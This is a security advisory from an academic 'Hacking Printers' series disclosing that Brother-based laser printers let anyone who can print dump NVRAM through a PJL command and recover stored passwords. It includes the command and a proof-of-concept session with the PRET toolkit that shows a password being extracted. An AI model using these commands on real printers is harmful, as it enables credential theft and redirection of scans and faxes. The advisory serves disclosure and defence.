TL;DR: In the scope of academic research on printer security, various vulnerabilities in network printers and MFPs have been discovered. This is advisory 3 of 6 of the `Hacking Printers' series. Each advisory discusses multiple issues of the same category. This post is about abusing Brother's proprietary PJL extensions to dump the printers NVRAM and gain access to interesting stuff like passwords. The attack can be performed by anyone who can print, for example through USB or network. It can even be carried out by a malicious website, using advanced cross-site printing techniques in combination with a novel technique we call `CORS spoofing' (see http://hacking-printers.net/wiki/index.php/Cross-site_printing). ======================[ Memory Access with PJL ]====================== -------------------------[ Affected Devices ]------------------------- This vulnerability may potentially affect all Brother based laser printers. It has been verfied for the devices listed below: - Brother MFC-9120CN (Firmware version: K.1.06) - Brother DCP-9045CDN (Firmware version: G.1.10) - Konica Minolta bizhub 20p (Firmware version: 3.11) Vendors informed: 2016-10-17 --------------------[ Vulnerability Description ]--------------------- The `Brother Laser Printer Technical Reference Guide' defines PJL commands to `write data to or retrieve data from the specified address of the printer's NVRAM': ---------------------------------------------------------------------- @PJL RNVRAM ADDRESS = X ---------------------------------------------------------------------- By incrementing the integer X and dumping the whole NVRAM an attacker can gain access to the embedded web server passwords. Furthermore a if set a user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker may also be able to change the Scan-to-FTP settings, so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. This issue is not new. It has been discussed by Andrei Costin and others. However it still seems to be present in Brother devices. -------------------------[ Proof of Concept ]------------------------- A Python based proof of concept software entitled Printer Exploitation Toolkit (PRET) has been published. The attack can be reproduced as follows: $ git clone https://github.com/RUB-NDS/PRET.git $ cd PRET $ ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ -----------------------[ Further Information ]------------------------ Information on Brother's nvram access bug/feature can be found at: http://hacking-printers.net/wiki/index.php/Memory_access http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf http://seclists.org/fulldisclosure/2013/Feb/40